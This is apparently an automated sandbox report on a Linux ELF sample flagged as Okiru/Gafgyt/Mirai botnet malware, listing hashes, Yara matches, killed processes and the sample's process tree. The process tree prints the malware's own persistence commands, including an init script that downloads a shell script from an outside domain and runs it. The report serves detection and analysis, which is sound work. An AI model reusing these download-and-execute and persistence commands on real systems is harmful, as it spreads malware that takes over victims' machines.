
Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name: x86_64.nn.elf
Analysis ID: 1520518
MD5: a43c7b0fb823947daaebc84fc7f18d51
SHA1: c95a119ea56a0c2b107c7ef47e852ee74e8ac891
SHA256: 0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900
Tags: elf, Gorilla, user-abuse_ch
Infos:

Detection

Okiru
Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520518
Start date and time: 2024-09-27 12:53:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: x86_64.nn.elf
Detection: MAL
Classification: mal92.spre.troj.evad.linELF@0/9@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: x86_64.nn.elf
Command: /tmp/x86_64.nn.elf
PID: 6211
Exit Code: 139
Exit Code Info: SIGSEGV (11) Segmentation fault invalid memory reference
Killed: False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_64.nn.elf (PID: 6211, Parent: 6128, MD5: a43c7b0fb823947daaebc84fc7f18d51) Arguments: /tmp/x86_64.nn.elf
    • sh (PID: 6213, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6214, Parent: 6213)
      • systemctl (PID: 6214, Parent: 6213, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6233, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6234, Parent: 6233)
      • chmod (PID: 6234, Parent: 6233, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mybinary
    • sh (PID: 6239, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6240, Parent: 6239)
      • ln (PID: 6240, Parent: 6239, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    • sh (PID: 6241, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
    • sh (PID: 6242, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6243, Parent: 6242)
      • chmod (PID: 6243, Parent: 6242, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/x86_64.nn.elf
    • sh (PID: 6244, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6245, Parent: 6244)
      • mkdir (PID: 6245, Parent: 6244, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6246, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6247, Parent: 6246)
      • ln (PID: 6247, Parent: 6246, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
  • sh (PID: 6215, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6215, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • systemd New Fork (PID: 6221, Parent: 6220)
  • snapd-env-generator (PID: 6221, Parent: 6220, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
Source | Rule | Description | Author | Strings
x86_64.nn.elf | JoeSecurity_Okiru | Yara detected Okiru | Joe Security
x86_64.nn.elf | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0xb9b4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.nn.elf | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0xc1a3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
x86_64.nn.elf | Linux_Trojan_Gafgyt_d4227dbf | unknown | unknown
  • 0x884e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0x8a8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
x86_64.nn.elf | Linux_Trojan_Gafgyt_d996d335 | unknown | unknown
  • 0xf026:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0

Source | Rule | Description | Author | Strings
6211.1.0000000000400000.0000000000413000.r-x.sdmp | JoeSecurity_Okiru | Yara detected Okiru | Joe Security
6211.1.0000000000400000.0000000000413000.r-x.sdmp | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0xb9b4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
6211.1.0000000000400000.0000000000413000.r-x.sdmp | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0xc1a3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
6211.1.0000000000400000.0000000000413000.r-x.sdmp | Linux_Trojan_Gafgyt_d4227dbf | unknown | unknown
  • 0x884e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0x8a8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
6211.1.0000000000400000.0000000000413000.r-x.sdmp | Linux_Trojan_Gafgyt_d996d335 | unknown | unknown
  • 0xf026:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0

No Suricata rule has matched

AV Detection

Source: x86_64.nn.elf | Avira: detected
Source: x86_64.nn.elf | ReversingLabs: Detection: 36%
Source: x86_64.nn.elf | String: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/null 2>&1which lldb > /dev/null 2>&1which dtrace > /dev/null 2>&1which truss > /dev/null 2>&1which ptrace > /dev/null 2>&1LD_PRELOADLD_LIBRARY_PATHLD_AUDIT/procw/etc/motd%s
Source: /tmp/x86_64.nn.elf (PID: 6211) | Socket: 0.0.0.0:38241
Source: x86_64.nn.elf, 6352.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp, profile.12.dr, inittab.12.dr, x86_64.nn.elf.34.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr | String found in binary or memory: http://pen.gorillafirewall.su/
Source: x86_64.nn.elf, 6211.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp | String found in binary or memory: http://pen.gorillafirewall.su/lol.sh

System Summary

Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_520deeb8, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_01e4a728, Author: unknown
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 788, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 884, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 1664, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 2096, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 2102, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 6215, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 6223, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6212) | SIGKILL sent: pid: 6250, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6290) | SIGKILL sent: pid: 6289, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6292) | SIGKILL sent: pid: 6291, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6311) | SIGKILL sent: pid: 1860, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6347) | SIGKILL sent: pid: 6346, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6352) | SIGKILL sent: pid: 6351, result: successful
Source: LOAD without section mappings | Program segment: 0x400000
Source: Initial sample | String containing 'busybox' found: /bin/busybox
Source: Initial sample | String containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/nu
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_807911a2 | os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
